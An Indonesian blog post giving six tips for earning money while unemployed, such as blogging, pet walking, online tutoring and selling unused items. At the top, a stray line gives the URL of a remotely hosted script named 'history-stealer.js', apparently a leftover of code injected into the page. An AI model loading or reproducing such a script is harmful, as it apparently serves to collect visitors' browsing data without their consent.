-->
https://cdn.statically.io/gh/darylfarahi/ikan/master/history-stealer.js

6 Cara Mudah Mendapatkan Uang saat Menganggur

Hai sobat, Apa Anda termasuk dalam orang yang sedang tidak memiliki pekerjaan? Lalu bagaimana cara mudah, cepat, dan berbeda yang dapat Anda coba agar tetap mendapatkan uang ketika menganggur?


Berikut ini merupakan 6 cara yang dapat anda coba lakukan saat nganggur:

1. Mulai Blog Anda Sendiri


Cobalah untuk memulai blog Anda sendiri. Isi blog-blog Anda dengan topik yang begitu menarik, bersifat pengetahuan, atau yang lainnya.
Untuk menjadi blogger tentunya memang tidaklah mudah, Anda diharuskan untuk rajin memposting dan riset keyword. Jika bisa, cobalah anda fokuskan pada satu topik yang Anda paling kuasai agar anda dapat bersaing dengan blog-blog lainnya.
Memang sih tidak cepat untuk mendapatkan uang dari blog, namun jangan pernah menyerah ataupun berhenti di tengah jalan. Tetap menulis dengan topik-topik yang menarik. Dan Jika Anda berhasil, uang yang akan didapatkan tentunya akan sangat menggiurkan lho.

2. Membantu Pekerjaan Orang Lain


Nah, Membantu pekerjaan orang yang membutuhkan bantuan adalah salah satu cara tercepat untuk mendapatkan uang. Tak semua orang memerlukan bantuan dengan menyewa seorang profesional lho, jadi ini kesempatan anda dan siapkan diri Anda untuk posisi ini.
Masih banyak pemilik anjing yang tak sempat mengajak anjing peliharaannya untuk sekedar jalan-jalan, Anda dapat mencoba hal ini. Anda juga dapat membantu orang-orang sekitar anda yang membutuhkan bantuan, seperti memotong rumput atau mengurus kebun.
Bukankah hal-hal itu gampang dilakukan? Dengan membantu orang sekitar, Anda tetap bisa lho mendapatkan uang cepat.

3. Pengajar Online


kalau mau mencari, Banyak sekali lho situs atau website yang mencari orang yang dapat mengajarkan keterampilan secara online. Jika Anda memiliki suatu keterampilan atau keahlian, baik itu pengetahuan perdagangan, pengetahuan tentang bahasa asing atau yang lainnya, Anda tentunya dapat mencoba hal tersebut lho.

Nah, Dari sana, Nantinya anda akan mendapatkan pengalaman baru dan anda dapat memasukkannya ke dalam CV anda, Enak kan?

4. Berpartisipasi dalam Studi Penelitian


Mungkin bagi kebanyakan orang, ikut serta dalam studi penelitian dan uji klinis terdengar sangat menakutkan karena adanya ketakutan bila melakukan sebuah kesalahan. Namun, saran saya, janganlah menjadi orang itu, beranilah untuk mencoba hal-hal baru itu.
Anda dapat mencoba untuk mencari sumbernya secara online. Carilah untuk panel penelitian, survei, uji klinis, dan peluang berbayar lainnya yang mencari peserta/audience. Uang yang akan didapatkan mungkin bervariasi yah, namun ini juga tetap dapat menjadi pilihan untuk dicoba.

5. Menjadi Youtuber Gaming


Pernahkah anda berfikir mendapat uang dari bermain video game? Tentu Anda akan bingung dan penasaran, emang bisa ya? He he he...... Tetapi jangan dianggap remeh yah karena kenyataannya memang benar, Memang bisa lho mendapat uang dari sini.
Berkat bantuan situs streaming seperti Twitch dan YouTube channel Gaming, kini banyak gamers yang sukses. Jika tertarik, Anda pun dapat mencobanya.
Namun, tidak mudah lho untuk menjadi seorang youtuber gaming, Anda akan membutuhkan peralatan yang tepat untuk mendukungnya separti kamera, mic dll. Dan juga, Anda juga perlu membangun penonton yang cukup besar agar bersedia berlangganan untuk terus menonton Anda.

Tapi tak ada yang tak mungkin lho di dunia ini, selama Anda melakukannya dengan tulus dan sungguh-sungguh tentu semuanya akan berhasil walaupun tak semulus kelihatannya.

6. Melelang atau Menjual Barang yang Tak Digunakan


Menjual barang yang tak digunakan lagi dapat menjadi pilihan yang bisa Anda coba juga. Anda dapat menjual barang-barang tersebut secara online atau dengan cara langsung lewat garage sale. Selain mendapatkan uang, Anda juga akan mendapatkan keuntungan yaitu membuat rumah terlihat lebih rapi.

Subscribe to receive free email updates: